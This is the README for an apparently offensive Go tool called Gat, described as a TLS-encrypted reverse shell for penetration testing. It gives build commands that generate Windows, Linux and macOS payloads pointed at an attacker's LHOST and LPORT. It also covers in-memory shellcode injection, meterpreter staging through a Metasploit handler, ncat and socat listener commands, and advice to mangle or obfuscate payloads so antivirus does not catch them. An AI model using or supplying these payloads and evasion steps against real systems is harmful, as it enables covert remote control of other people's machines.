github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/README.md

github.com/m1ddl3w4r3/Gat@v0.0.0-20221205171512-b6bb6e613409/README.md (about)

     1  # Gat
     2  Golang Access Tool
     3  
     4  Simple TCP reverse shell written in [Go](https://golang.org).
     5  It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.
     6  
     7  ###Note: I dont take credit for the majority of this code. This is a combination of two tools i use often in pentest with slight tweaks to change signatures and a script to automate the deployment of said tools.
     8  
     9  Supported OS are:
    10  
    11  - Windows
    12  - Linux
    13  - Mac OS
    14  - FreeBSD and derivatives
    15  
    16  ## Getting started & dependencies
    17  
    18  Since this is a Go project, you will need to follow the [official documentation](https://golang.org/doc/install) to set up
    19  your Golang environment.\
    20  (with the `$GOPATH` environment variable).
    21  
    22  ```
    23  git clone https://github.com/m1ddl3w4r3/Gat.git
    24  cd Gat
    25  go mod init Gat/Gat
    26  go mod tidy
    27  go build Mangle.go
    28  ```
    29  ## Usage
    30  Gat will use 'MSF's Multi Handler' by default.(If listener selected)\
    31  Other options are available such as:
    32  
    33  *socat\
    34  *ncat
    35  
    36  These shells can be upgraded to meterpreter shells using the 'meterpreter' command in Gat.
    37  
    38  ##Gat.sh to make things easy.
    39  ***WARNING*** Change CN in make file to accurately reflect you Orgs Certificate or Hostname of HTTPS server.
    40  ```
    41  ./Gat.sh - Will show example and ascii art.
    42  ./Gat.sh [ Windows|Mac|Linux ] <LHOST> <LPORT> - Will generate given OS type payload.
    43  ./Gat.sh Cleanup - Will cleanup past deployments.
    44  ```
    45  
    46  This custom interactive shell will allow you to execute system commands through `cmd.exe` on Windows, or `/bin/sh` on UNIX machines.
    47  
    48  The following special commands are supported:
    49  
    50  * ``run_shell`` : drops you an system shell (allowing you, for example, to change directories)
    51  * ``inject <base64 shellcode>`` : injects a shellcode (base64 encoded) in the same process memory, and executes it
    52  * ``meterpreter [tcp|http|https] IP:PORT`` : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter agent from metasploit, and execute the shellcode in memory (Windows only at the moment)
    53  * ``exit`` : exit gracefully
    54  
    55  
    56  ## Examples
    57  
    58  ### Basic usage
    59  
    60  
    61  
    62  ## Meterpreter staging
    63  **WARNING**: this currently only work for the Windows platform.
    64  
    65  The meterpreter staging currently supports the following payloads :
    66  
    67  * `windows/x64/meterpreter/reverse_tcp`
    68  * `windows/x64/meterpreter/reverse_http`
    69  * `windows/x64/meterpreter/reverse_https`
    70  
    71  To use the correct one, just specify the transport you want to use (tcp, http, https)
    72  To use the meterpreter staging feature, just start your handler:
    73  
    74  ```bash
    75  use exploit/multi/handler
    76  set payload windows/x64/meterpreter/reverse_tcp
    77  set lhost 127.0.0.1
    78  set lport 8443
    79  set HandlerSSLCert ./server.pem
    80  exploit -j
    81  ```
    82  
    83  Then, in `Gat`, use the `meterpreter` command:
    84  
    85  ```bash
    86  [Gat]> meterpreter https 127.0.0.1:8443
    87  ```
    88  A new meterpreter session should pop in `msfconsole`:
    89  
    90  Here is an example with `ncat`:
    91  
    92  ```
    93  ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
    94  ```
    95  
    96  'socat' example (tested with version `1.7.3.2`):
    97  ```
    98  socat `tty` OPENSSL-LISTEN:1234,reuseaddr,cert=server.pem,key=server.key,verify=0
    99  ```
   100  
   101  ## Manually create GAT for more custom setup.
   102  ***WARNING*** Generating this way will not apply mangle to the payload and could be caught by AV. \
   103  (Make sure to obfuscate it if you do this.)
   104  
   105  You will need to generate a valid certificate:
   106  ```bash
   107  $ make depends
   108  openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
   109  Generating a 4096 bit RSA private key
   110  ....................................................................................++
   111  .....++
   112  writing new private key to 'server.key'
   113  -----
   114  cat server.key >> server.pem
   115  ```
   116  
   117  For windows:
   118  
   119  ```bash
   120  # Predifined 32 bit target
   121  $ make windows32 LHOST=192.168.0.12 LPORT=1234
   122  # Predifined 64 bit target
   123  $ make windows64 LHOST=192.168.0.12 LPORT=1234
   124  ```
   125  
   126  For Linux:
   127  ```bash
   128  # Predifined 32 bit target
   129  $ make linux32 LHOST=192.168.0.12 LPORT=1234
   130  # Predifined 64 bit target
   131  $ make linux64 LHOST=192.168.0.12 LPORT=1234
   132  ```
   133  
   134  For Mac OS X
   135  ```bash
   136  # Predifined 32 bit target
   137  $ make macos32 LHOST=192.168.0.12 LPORT=1234
   138  # Predifined 64 bit target
   139  $ make macos64 LHOST=192.168.0.12 LPORT=1234
   140  ```
   141  
   142  ## Credits
   143  Ronan Kervella `<r.kervella -at- sysdream -dot- com>` - For his [Hershell](https://github.com/lesnuages.hershell) repo.\
   144  @Tyl0us - For his awesome work on [Mangle](https://github.com/optiv/mangle).